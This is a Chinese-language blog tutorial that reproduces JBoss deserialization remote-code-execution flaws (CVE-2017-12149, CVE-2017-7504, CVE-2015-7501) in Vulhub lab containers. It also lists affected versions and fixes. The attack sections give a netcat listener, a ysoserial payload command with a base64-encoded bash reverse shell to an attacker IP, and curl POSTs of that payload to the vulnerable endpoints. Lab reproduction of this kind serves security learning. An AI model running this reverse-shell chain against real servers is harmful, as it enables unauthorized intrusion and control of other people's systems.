JBOSS反序列化漏洞解析与防范策略CVE-2017-12149
JBOSS反序列化漏洞解析与防范策略
引言
JBOSS是一个流行的开源应用服务器,广泛应用于企业级应用程序的开发和部署。然而,由于其广泛的使用和复杂的架构,JBOSS也成为了黑客攻击的常见目标。近年来,多个JBOSS漏洞被曝光,这些漏洞允许攻击者远程执行任意代码、窃取数据或导致服务中断,对企业和用户的信息安全构成了严重威胁。因此,理解和防范JBOSS漏洞成为了网络安全领域的重要课题。
JBOSS反序列化漏洞是近年来网络安全领域中的一个热点问题。反序列化是将序列化数据还原为对象的过程,而在JBOSS中,由于对输入数据的反序列化处理不当,攻击者可以利用这一过程注入恶意代码,从而实现远程代码执行、数据泄露等攻击。这种漏洞的存在,不仅威胁到JBOSS服务器本身的安全,还可能影响到使用JBOSS的应用程序和其背后的整个企业系统。因此,深入理解JBOSS反序列化漏洞的原理及其防范策略,对于保障网络安全具有重要意义。
原理
JBOSS反序列化漏洞的原理主要涉及到Java序列化机制。在Java中,序列化是将对象转换为字节流的过程,以便于存储或传输。反序列化则是将字节流重新转换为对象的过程。当JBOSS服务器接收到来自客户端的序列化数据时,它会尝试将这些数据反序列化为对象。如果攻击者精心构造了这些序列化数据,使其在反序列化过程中执行恶意代码,那么就可以实现远程代码执行等攻击。
环境搭建
介绍
Vulhub,由资深安全专家打造的开源漏洞靶场环境,已成为网络安全研究和测试的得力助手。它基于Docker和Docker Compose,为安全研究人员提供了一个快速、便捷的方式来搭建、使用和分享各种漏洞环境。
Vulhub的创建旨在简化漏洞测试流程,提供一个标准的测试平台,让安全研究更加高效和系统化。通过Vulhub,研究人员可以快速部署漏洞场景,进行深入研究,而无需担心对实际生产环境的影响。
对于网络安全爱好者来说,学习如何搭建Vulhub是提升技能的必经之路。这不仅涉及Docker和Docker Compose的技术应用,也是理解漏洞测试基本流程的实践机会。
搭建步骤
环境准备
Ubuntu虚拟机(其他Linux虚拟机也可以)、docker、docker-compose
下载vulhub(记得Star)
下载地址:vulhub/vulhub:基于 Docker-Compose 的预构建脆弱环境 — vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose
上传至虚拟机
使用XFTP或者使用VMware提供的复制粘贴功能粘贴到虚拟机并解压,推荐放到桌面,方便管理
工具下载
下载地址:frohoff/ysosarial:一个概念验证工具,用于生成利用不安全 Java 对象私有化的有效负载。 — frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
java环境推荐1.8(亲测有效)
CVE-2017-12149
漏洞描述
CVE-2017-12149漏洞是一个反序列化远程代码执行漏洞,存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。攻击者可以通过构造恶意序列化数据,在未经身份验证的情况下在服务器上执行任意代码,从而控制服务器
影响范围
该漏洞影响以下版本的JBoss应用服务器:
- JBoss 5.x版本
- JBoss 6.x版本
漏洞原理
JBoss应用服务器在处理来自客户端的序列化数据时,没有进行适当的安全检查和限制,导致攻击者可以利用精心设计的序列化数据执行任意代码。具体来说,漏洞出现在/invoker/readonly路径下,服务器将用户提交的POST内容进行了Java反序列化1247
环境搭建
- 进入靶场环境文件夹
cd Desktop/vulhub-master/jboss/CVE-2017-12149/ - 开启环境
docker-compose up -d - 使用
docker ps查看正在运行的容器,可以看到端口号为8080 - 使用浏览器访问

攻击复现
-
使用浏览器访问
192.168.35.128:8080/invoker/readonly,出现如下界面

-
监听端口
# linux下使用 nc -lvp 8888 # windows下可以使用nmap工具的监听端口功能 ncat -lvp 8888 -
进入到到工具目录
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" >poc.serYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx为计划任务反弹Shellbash -i >& /dev/tcp/192.168.35.1/8888 0>&1的base64加密值,将其中的IP地址(攻击机IP地址)和监听端口改为自己需要的,在进行base64加密,ysoserial-all.jar为自己的工具文件名curl http://192.168.35.128:8080/invoker/readonly --data-binary @poc.ser使用
curl工具向指定的http://192.168.35.128:8080/invoker/readonly发送一个 POST 请求,其中包含了名为poc.ser的文件内容作为请求体。 -
成功反弹Shell

修复方案
针对CVE-2017-12149漏洞,修复方案包括:
- 升级JBoss版本:升级到不受影响的JBoss版本(例如,JBoss 7.x版本)。
- 删除不必要的组件:如果不需要http-invoker.sar组件,可以直接删除该组件。
- 添加安全控制:在http-invoker.sar下web.xml的security-constraint标签中添加访问控制,限制对http invoker组件的访问
CVE-2017-7504
漏洞描述
CVE-2017-7504漏洞存在于JBoss AS 4.x及之前版本的JbossMQ组件中。具体来说,漏洞位于HTTPServerILServlet.java文件,该文件在处理反序列化数据时没有进行适当的安全检查,导致攻击者可以借助特制的序列化数据执行任意代码
影响范围
该漏洞影响JBoss AS 4.x及之前版本
环境搭建
使用vulhub靶场,搭建教程vulhub搭建教程
- 进入靶场环境文件夹
cd Desktop/vulhub-master/jboss/CVE-2017-7504/ - 开启环境
docker-compose up -d - 使用
docker ps查看正在运行的容器,可以看到端口号为8080 - 使用浏览器访问

攻击复现
-
使用浏览器访问
192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet,出现如下界面

-
其他步骤与CVE-2017-12149相同,只有最后请求的网址变了
curl http://192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
修复建议
- 升级版本:升级到不受该漏洞影响的JBoss版本。
- 禁用相关服务:如果不需要JBossMQ服务,可以禁用该服务以避免漏洞利用。
- 修改配置:在服务器配置中限制对敏感路径的访问,例如修改
jboss-web.deployer/server.xml中的绑定地址
JMXInvokerServlet-deserialization(CVE-2015-7501)
漏洞描述
JBoss在处理 /invoker/JMXInvokerServlet 请求时,会读取用户传入的对象并进行反序列化。攻击者可以利用Apache Commons Collections中的Gadget来执行任意代码
影响范围
该漏洞影响以下版本的JBoss产品:
- JBoss Enterprise Application Platform 6.4.4, 5.2.0, 4.3.0 CP10
- JBoss AS (Wildly) 6及之前版本
- JBoss A-MQ 6.2.0
- JBoss Fuse 6.2.0
- JBoss SOA Platform (SOA-P) 5.3.1
- JBoss Data Grid (JDG) 6.5.0
- JBoss BRMS (BRMS) 6.1.0
- JBoss BPMS (BPMS) 6.1.0
- JBoss Data Virtualization (JDV) 6.1.0
- JBoss Fuse Service Works (FSW) 6.0.0
- JBoss Enterprise Web Server (EWS) 2.1, 3.0
环境搭建
使用vulhub靶场,搭建教程vulhub搭建教程
- 进入靶场环境文件夹
cd Desktop/vulhub-master/jboss/JMXInvokerServlet-deserialization/ - 开启环境
docker-compose up -d - 使用
docker ps查看正在运行的容器,可以看到端口号为8080 - 使用浏览器访问

攻击复现
-
使用浏览器访问
192.168.35.128:8080/invoker/JMXInvokerServlet,下载了文件,说明漏洞存在 -
其他步骤与CVE-2017-12149相同,只有最后请求的网址变了
curl http://192.168.35.128:8080/invoker/JMXInvokerServlet --data-binary @poc.ser
修复建议
- 更新版本:升级到不受该漏洞影响的JBoss版本。
- 禁用相关服务:如果不需要JBossMQ服务,可以禁用该服务以避免漏洞利用。
- 修改配置:在服务器配置中限制对敏感路径的访问。例如,修改
jboss-web.deployer/server.xml中的绑定地址。 - 使用安全库:更新Apache Commons Collections库,并使用SerialKiller来控制反序列化的可信类型
参考文章:
JBoss反序列化漏洞复现_cve-2017-7504-CSDN博客
相关文章:
JBOSS反序列化漏洞解析与防范策略CVE-2017-12149
JBOSS反序列化漏洞解析与防范策略 引言 JBOSS是一个流行的开源应用服务器,广泛应用于企业级应用程序的开发和部署。然而,由于其广泛的使用和复杂的架构,JBOSS也成为了黑客攻击的常见目标。近年来,多个JBOSS漏洞被曝光࿰…...
MySQL MVCC工作流程详解
MySQL MVCC工作流程详解 1. 基础概念 MVCC(多版本并发控制)是通过在每行记录后面保存多个版本来实现并发控制的技术,主要用于提供并发事务访问数据库时的读一致性。 2. 核心要素 2.1 事务ID(DB_TRX_ID) 每个事务都…...
Web3技术下数字资产数据保护的实践探索
在这个信息爆炸的时代,数字资产已经成为我们生活中不可或缺的一部分。随着Web3技术的兴起,它以其去中心化、透明性和安全性的特点,为数字资产的管理和保护提供了新的解决方案。本文将探讨Web3技术在数字资产数据保护方面的实践探索࿰…...
从PPT到PNG:Python实现的高效PPT转图工具
从PPT到PNG:Python实现的高效PPT转图工具 在日常工作中,PPT(PowerPoint)文件是我们常用的演示工具。然而,有时候我们需要将PPT的内容提取为图片格式(如PNG)以便于展示或保存。手动将每一页PPT保…...
使用 Java 8 Stream实现List重复数据判断
import java.util.*; import java.util.stream.Collectors;public class DeduplicateStreamExample {static class ArchiveItem {// 字段定义与Getter/Setter省略(需根据实际补充)private String mATNR;private String lIFNR;private String suppSpecMod…...
状态模式详解与真实场景案例(Java实现)
模式定义 状态模式(State Pattern) 允许对象在其内部状态改变时改变它的行为,使对象看起来像是修改了它的类。属于行为型设计模式,核心思想是将状态抽象为独立对象,不同状态下行为封装在不同状态类中。 解决的问题 …...
BitMap和RoaringBitmap:极致高效的大数据结构
目录 1、引言 2、BitMap:基础 2.1、核心原理 2.2、BitMap的优势 2.3、BitMap的局限性 3、RoaringBitmap:进化 3.1、分段策略 3.2、三种容器类型 3.2.1. ArrayContainer(数组容器) 3.2.2. BitMapContainer(位图容器) 3.2.3. RunContainer(行程容器) 3.3、行…...
【Java基础】Java集合遍历方式
前言 在Java编程中,集合(Collection)是存储和操作对象的核心工具。遍历集合是开发者最频繁的操作之一,但不同场景下选择合适的遍历方式至关重要。 一、基础遍历方式 1. 基本for循环 适用场景:仅适用于List等有序集…...
Rust-引用借用规则
目录 一、概述 二、借用规则 三、详细解释 3.1 第一条规则 3.2 第二条规则 3.3 第三条规则 四、总结 Welcome to Code Blocks blog 本篇文章主要介绍了 [Rust-引用借用规则] ❤博主广交技术好友,喜欢文章的可以关注一下❤ 一、概述 Rust为确保程序在运行时不…...
如何保障企业数据的安全?软件开发中的数据安全防护措施
引言 随着数字化转型的推进,数据已经成为企业最重要的资产之一。然而,随着数据量的增长,数据泄露、丢失和滥用的风险也不断增加。如何保障企业数据的安全,成为企业在进行软件开发时必须重点关注的问题。本文将介绍软件开发中的一些…...
Linux安装开源版MQTT Broker——EMQX服务器环境从零到一的详细搭建教程
零、EMQX各个版本的区别 EMQX各个版本的功能对比详情https://docs.emqx.com/zh/emqx/latest/getting-started/feature-comparison.html...
【软件工程大系】净室软件工程
净室软件工程(Cleanroom Software Engineering)是一种以缺陷预防(正确性验证)为核心的软件开发方法,旨在通过严格的工程规范和数学验证,在开发过程中避免缺陷的产生,而非依赖后期的测试和调试。…...
软考 系统架构设计师系列知识点之杂项集萃(49)
接前一篇文章:软考 系统架构设计师系列知识点之杂项集萃(48) 第76题 某文件管理系统在磁盘上建立了位视图(bitmap),记录磁盘的使用情况。若磁盘上物理块的编号依次为:0、1、2、……;…...
Day(21)--网络编程
网络编程 在网络通信协议下,不同计算机上运行的程序,进行的数据传输 应用场景:即使通信、网友对战、金融证券等等,不管是什么场景,都是计算机和计算机之间通过网络进行的数据传输 java.net 常见的软件架构 C/S&am…...
JVM 调优不再难:AI 工具自动生成内存优化方案
在 Java 应用程序的开发与运行过程中,Java 虚拟机(JVM)的性能调优一直是一项极具挑战性的任务,尤其是内存优化方面。不合适的 JVM 内存配置可能会导致应用程序出现性能瓶颈,甚至频繁抛出内存溢出异常,影响业…...
封装Tcp Socket
封装Tcp Socket 0. 前言1. Socket.hpp2. 简单的使用介绍 0. 前言 本文中用到的Log.hpp在笔者的历史文章中都有涉及,这里就不再粘贴源码了,学习地址如下:https://blog.csdn.net/weixin_73870552/article/details/145434855?spm1001.2014.3001…...
5.1 GitHub订阅监控系统实战:FastAPI+SQLAlchemy高效架构设计与核心源码揭秘
GitHub Sentinel Agent 分析报告功能设计与实现 关键词:订阅管理 API 设计、GitHub API 集成、SQLAlchemy ORM、JWT 认证、单元测试框架 1. 订阅管理功能架构设计 订阅管理模块采用分层架构设计,通过 FastAPI 构建 RESTful 接口,结合 SQLAlchemy ORM 实现数据持久化: #me…...
2025年推荐使用的开源大语言模型top20:核心特性、选择指标和开源优势
李升伟 编译 随着人工智能技术的持续发展,开源大型语言模型(LLMs)正变得愈发强大,使最先进的AI能力得以普及。到2025年,开源生态系统中涌现出多个关键模型,它们在各类应用场景中展现出独特优势。 大型语言…...
Linux 入门九:Linux 进程间通信
概述 进程间通信(IPC,Inter-Process Communication)是指在不同进程之间传递数据和信息的机制。Linux 提供了多种 IPC 方式,包括管道、信号、信号量、消息队列、共享内存和套接字等。 方式 一、管道(Pipe)…...
Spark-SQL核心编程实战:自定义函数与聚合函数详解
在大数据处理领域,Spark-SQL是极为重要的工具。今天和大家分享一下在Spark-SQL开发中的自定义函数和聚合函数的使用,这些都是基于实际项目开发经验的总结。 在Spark-SQL开发时,第一步是搭建开发环境。在IDEA中创建Spark-SQL子模块,…...
[Mysql][Mybatis][Spring]配置文件未能正确给驱动赋值,.properties文件username值被替换
这是最初的.properties配置文件: drivercom.mysql.cj.jdbc.Driver urljdbc:mysql://localhost:3306/qykf usernameroot password123456 在Mybatis中引入后进行赋值: <environments default"development"><environment id"deve…...
go 指针接收者和值接收者的区别
go 指针接收者和值接收者的区别 指针接收者和值接收者的区别主要有两点: Go 中函数传参是传值,因此指针接收者传递的是接收者的指针拷贝,值接收者传递的是接收者的拷贝---在方法中指针接收者的变量会被修改,而值接收者的成员变量…...
Redis之缓存更新策略
缓存更新策略 文章目录 缓存更新策略一、策略对比二、常见的缓存更新策略三、如何选择策略四、实际应用示例五、使用 Cache-Aside TTL 的方式,实现缓存商铺信息详情1.引入StringRedisTemplate2.将查询商铺信息加入缓存3.更新商铺信息时移除缓存总结 六、注意事项 一…...
【leetcode100】杨辉三角
1、题目描述 给定一个非负整数 numRows,生成「杨辉三角」的前 numRows 行。 在「杨辉三角」中,每个数是它左上方和右上方的数的和。 示例 1: 输入: numRows 5 输出: [[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]示例 2: 输入: numRows 1 输出: [[1]…...
git reset详解
一、git reset 的核心作用 用于 移动当前分支的 HEAD 指针 到指定的提交,并可选择是否修改工作区和暂存区。 ⚠️ 注意:若提交已被推送到远程仓库,强制重置(--hard)后需谨慎操作,避免影响协作。 二、三种模…...
Selenium2+Python自动化:利用JS解决click失效问题
文章目录 前言一、遇到的问题二、点击父元素问题分析解决办法实现思路 三、使用JS直接点击四、参考代码 前言 在使用Selenium2和Python进行自动化测试时,我们有时会遇到这样的情况:元素明明已经被成功定位,代码运行也没有报错,但…...
OpenStack Yoga版安装笔记(十九)启动一个实例(Self-service networks)
1、概述 1.1 官方文档 Launch an instancehttps://docs.openstack.org/install-guide/launch-instance.html 《OpenStack Yoga版安装笔记(十四)启动一个实例》文档中,已经按照Option1: Provider networks创建网络。 本文按照Option2&#…...
数据结构(java)栈与队列
栈:(先进后出) 入栈: 1.普通栈一定要放、最小栈放的原则是: *如果最小栈是空的,那么放 *如果最小栈的栈顶元素没有当前的元素小,则放 2.如果要放的的元素小于等于最小栈栈顶元素可以放吗?放 出栈: 需要…...
Flask+Plotly结合动态加载图形页面实践
1. DeepSeek帮我实践 1.1. 我的提问既设计方案 原有如下主页:dashboard.html,现增加“预测模型学习”,对感知机神经网络描述如下: 1、输入与输出为固定值,例如输入层215,输出层48; 2、模型为回归神经网络; 3、中层是可动态调整的,例如定义如下:第二层,200,第三层…...
数学教学通讯杂志数学教学通讯杂志社数学教学通讯编辑部2025年第6期目录
课程教材教法 “课程思政”视域下的高中数学教学探索与实践——以“函数概念的发展历程”为例 赵文博; 3-617 PBL教学模式下高中统计教学的探索与实践——以“随机抽样(第一课时)”为例 陈沛余; 7-10 “三新”背景下的高中数学教学困境与应对…...
